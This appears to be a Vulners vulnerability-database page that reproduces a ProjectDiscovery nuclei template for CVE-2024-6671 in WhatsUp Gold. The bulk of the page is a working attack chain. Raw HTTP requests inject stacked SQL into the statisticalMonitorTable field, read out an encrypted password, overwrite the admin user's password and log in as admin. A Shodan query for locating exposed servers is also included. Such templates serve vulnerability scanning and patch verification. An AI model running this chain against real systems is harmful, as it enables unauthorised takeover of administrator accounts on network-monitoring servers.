Lucene search
K

WhatsUp Gold GetStatisticalMonitorList SQL Injection - Authentication Bypass

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

WhatsUp Gold SQL injection enables unauthenticated access to encrypted password and bypass.

Related
Refs
Code
id: CVE-2024-6671

info:
  name: WhatsUp Gold GetStatisticalMonitorList SQL Injection - Authentication Bypass
  author: daffainfo,jjcho
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, if the application is configured with only a single user, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
  impact: |
    Unauthenticated attackers can exploit SQL injection to retrieve encrypted user passwords, modify admin credentials, and achieve authentication bypass for full system access.
  remediation: |
    Update WhatsUp Gold to version 2024.0.0 or later to address the SQL injection vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-24-1186/
    - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
    - https://www.progress.com/network-monitoring
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6671
    cwe-id: CWE-89
    epss-score: 0.14886
    epss-percentile: 0.96292
    cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
    product: whatsup_gold
    vendor: progress
  tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,vkev,vuln

flow: |
  http(1);
  http(2);
  http(3);
  encryptedPassword = template.encryptedPassword
  const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
  const hexValues = cleanedInput.map(value => {
    const num = parseInt(value);
    return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
  });
  const hexString = hexValues.join('');
  const varbinaryString = '0x' + hexString;
  set("encryptedPassword", varbinaryString);
  http(4) && http(5);

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/Filter/DeviceStatisticalMonitors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId":"1234","statisticalMonitorTable":"StatisticalPingCache si on p.nPivotStatisticalMonitorTypeToDeviceID = si.nPivotStatisticalMonitorTypeToDeviceID; UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');Select null,null,null,null,null,null From PivotStatisticalMonitorTypeToDevicep Inner Join StatisticalPingCache","includeDisabledMonitors":"true","statisticalIdentificationId":"1"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains(body, '[]')
        condition: and
        internal: true

  - raw:
      - |
        GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'DisplayName')
        condition: and
        internal: true

    extractors:
      - type: regex
        internal: true
        name: encryptedPassword
        regex:
          - '"psyduck\d+(,\d+)*"'

  - raw:
      - |
        POST /NmConsole/Platform/Filter/DeviceStatisticalMonitors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId":"1234","statisticalMonitorTable":"StatisticalPingCache si on p.nPivotStatisticalMonitorTypeToDeviceID = si.nPivotStatisticalMonitorTypeToDeviceID; UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';Select null,null,null,null,null,null From PivotStatisticalMonitorTypeToDevicep Inner Join StatisticalPingCache","includeDisabledMonitors":"true","statisticalIdentificationId":"1"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains(body, '[]')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/User/LoginAjax HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&rememberMe=false

    matchers:
      - type: word
        part: body
        words:
          - '"authenticated":true'
          - '"username":"'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a00473045022100d3c24effc65431bd9b92a95997d4bd0f8076d4a76a04fd78fcc6f4574a3c35ed02201a01fc17e22b491894fed60dfbb33fb1e3d291cc2b751c848c61b46859ee3021:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation